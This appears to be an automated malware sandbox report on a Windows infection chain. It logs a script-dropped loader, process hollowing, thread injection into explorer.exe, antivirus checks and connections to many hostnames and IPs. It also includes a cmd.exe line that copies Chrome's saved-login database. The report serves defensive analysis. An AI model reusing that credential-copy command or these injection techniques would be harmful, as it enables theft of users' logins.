Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCAE44 mov eax, dword ptr fs:[00000030h] 9_2_00CCAE44
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCEA55 mov eax, dword ptr fs:[00000030h] 9_2_00CCEA55
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C94257 mov eax, dword ptr fs:[00000030h] 9_2_00C94257
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CBB260 mov eax, dword ptr fs:[00000030h] 9_2_00CBB260
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CBB260 mov eax, dword ptr fs:[00000030h] 9_2_00CBB260
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1766D mov eax, dword ptr fs:[00000030h] 9_2_00C1766D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD8A62 mov eax, dword ptr fs:[00000030h] 9_2_00CD8A62
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 9_2_00C2AE73
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 9_2_00C2AE73
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 9_2_00C2AE73
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 9_2_00C2AE73
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 9_2_00C2AE73
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4927A mov eax, dword ptr fs:[00000030h] 9_2_00C4927A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0C600 mov eax, dword ptr fs:[00000030h] 9_2_00C0C600
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0C600 mov eax, dword ptr fs:[00000030h] 9_2_00C0C600
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0C600 mov eax, dword ptr fs:[00000030h] 9_2_00C0C600
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C38E00 mov eax, dword ptr fs:[00000030h] 9_2_00C38E00
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1608 mov eax, dword ptr fs:[00000030h] 9_2_00CC1608
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C18A0A mov eax, dword ptr fs:[00000030h] 9_2_00C18A0A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C05210 mov eax, dword ptr fs:[00000030h] 9_2_00C05210
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C05210 mov ecx, dword ptr fs:[00000030h] 9_2_00C05210
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C05210 mov eax, dword ptr fs:[00000030h] 9_2_00C05210
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C05210 mov eax, dword ptr fs:[00000030h] 9_2_00C05210
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0AA16 mov eax, dword ptr fs:[00000030h] 9_2_00C0AA16
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0AA16 mov eax, dword ptr fs:[00000030h] 9_2_00C0AA16
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C23A1C mov eax, dword ptr fs:[00000030h] 9_2_00C23A1C
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3A61C mov eax, dword ptr fs:[00000030h] 9_2_00C3A61C
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3A61C mov eax, dword ptr fs:[00000030h] 9_2_00C3A61C
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0E620 mov eax, dword ptr fs:[00000030h] 9_2_00C0E620
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C44A2C mov eax, dword ptr fs:[00000030h] 9_2_00C44A2C
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C44A2C mov eax, dword ptr fs:[00000030h] 9_2_00C44A2C
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CBFE3F mov eax, dword ptr fs:[00000030h] 9_2_00CBFE3F
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C853CA mov eax, dword ptr fs:[00000030h] 9_2_00C853CA
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C853CA mov eax, dword ptr fs:[00000030h] 9_2_00C853CA
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C303E2 mov eax, dword ptr fs:[00000030h] 9_2_00C303E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C303E2 mov eax, dword ptr fs:[00000030h] 9_2_00C303E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C303E2 mov eax, dword ptr fs:[00000030h] 9_2_00C303E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C303E2 mov eax, dword ptr fs:[00000030h] 9_2_00C303E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C303E2 mov eax, dword ptr fs:[00000030h] 9_2_00C303E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C303E2 mov eax, dword ptr fs:[00000030h] 9_2_00C303E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2DBE9 mov eax, dword ptr fs:[00000030h] 9_2_00C2DBE9
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C437F5 mov eax, dword ptr fs:[00000030h] 9_2_00C437F5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC138A mov eax, dword ptr fs:[00000030h] 9_2_00CC138A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CBD380 mov ecx, dword ptr fs:[00000030h] 9_2_00CBD380
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C11B8F mov eax, dword ptr fs:[00000030h] 9_2_00C11B8F
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C11B8F mov eax, dword ptr fs:[00000030h] 9_2_00C11B8F
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3B390 mov eax, dword ptr fs:[00000030h] 9_2_00C3B390
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32397 mov eax, dword ptr fs:[00000030h] 9_2_00C32397
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C18794 mov eax, dword ptr fs:[00000030h] 9_2_00C18794
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C87794 mov eax, dword ptr fs:[00000030h] 9_2_00C87794
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C87794 mov eax, dword ptr fs:[00000030h] 9_2_00C87794
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C498F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_00C498F0

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: bin.exe.0.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.161 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.172 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.localbloom.online
Source: C:\Windows\explorer.exe Network Connect: 23.19.171.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.siberup.xyz
Source: C:\Windows\explorer.exe Domain query: www.brandpay.xyz
Source: C:\Windows\explorer.exe Domain query: www.getbusinesscreditandfunding.com
Source: C:\Windows\explorer.exe Domain query: www.shcylzc.com
Source: C:\Windows\explorer.exe Domain query: www.thepowerofanopenquestion.com
Source: C:\Windows\explorer.exe Domain query: www.xn--wsthof-camping-gsb.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.vitality-patients.online
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.harmlett.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.waermark.com
Source: C:\Windows\explorer.exe Domain query: www.jdhwh2nbiw234.com
Source: C:\Windows\explorer.exe Network Connect: 68.66.224.33 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.149 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tentanguang.online
Source: C:\Windows\explorer.exe Domain query: www.angelmatic.net
Source: C:\Windows\explorer.exe Network Connect: 185.134.245.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.82.37.10 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 13C0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: unknown protection: read write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread register set: target process: 3688 Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3688 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: explorer.exe, 00000003.00000000.439768736.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.446508824.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.536654826.000000000081C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.402775059.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.470593620.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.439768736.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.439768736.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.471049748.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.403164706.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.439768736.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.471049748.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.403164706.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
